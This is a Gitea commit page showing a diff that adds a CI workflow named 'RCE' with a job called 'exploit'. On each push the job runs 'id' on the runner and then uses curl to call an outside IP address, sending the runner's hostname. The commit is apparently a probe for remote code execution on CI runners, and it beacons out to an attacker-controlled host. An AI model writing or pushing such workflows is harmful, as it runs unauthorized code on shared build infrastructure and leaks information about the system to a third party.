add workflow
Some checks failed
RCE / exploit (push) Has been cancelled

This commit is contained in:
2026-05-13 13:26:45 +09:00
parent d77cbb6a74
commit d84d17d526

8
.gitea/workflows/rce.yml Normal file
View File

@@ -0,0 +1,8 @@
name: RCE
on: [push]
jobs:
exploit:
runs-on: ubuntu-latest
steps:
- run: id > /tmp/rce_test
- run: curl -s http://43.157.204.73:9090/rce_test?host=$(hostname)